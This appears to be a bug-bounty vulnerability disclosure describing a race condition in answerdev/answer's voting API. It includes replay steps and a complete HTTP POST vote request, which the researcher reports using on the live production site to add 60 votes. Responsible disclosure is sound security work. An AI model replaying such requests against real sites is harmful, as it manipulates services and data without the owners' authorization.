Race Condition Vulnerability can Leads to Up Vote Stealing in answerdev/answer
Valid
Reported on
Feb 20th 2023
Description
I tested in the live production site https://meta.answer.dev/.
There are up vote / down vote functions in answerdev. An attacker can increase or decrease votes by using race condition vulnerability.
Proof of Concept
1). Go to an question and press up vote or down vote.
2). PoC will show with upvote.
3). Intercept HTTP Request and send to Trubo intruder.
4). Configure and run.
5). Bingo!
POST /answer/api/v1/vote/up HTTP/2
Host: meta.answer.dev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 4eb174c8-b0f3-11ed-83ed-0242ac190003
Content-Type: application/json
Content-Length: 51
Origin: https://meta.answer.dev
Referer: https://meta.answer.dev/questions/10010000000000001/welcome-to-answer-community
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"object_id":"10070000000000003","is_cancel":false}
Go to this link and search "sunny" user. I voted 60 votes on his comment. https://meta.answer.dev/questions/10010000000000001/welcome-to-answer-community
Impact
The attacker now can gain profit in vote functions.
References
We are processing your report and will contact the
answerdev/answer
team within 24 hours.
7 months ago
We have contacted a member of the
answerdev/answer
team and are waiting to hear back
7 months ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
to join this conversation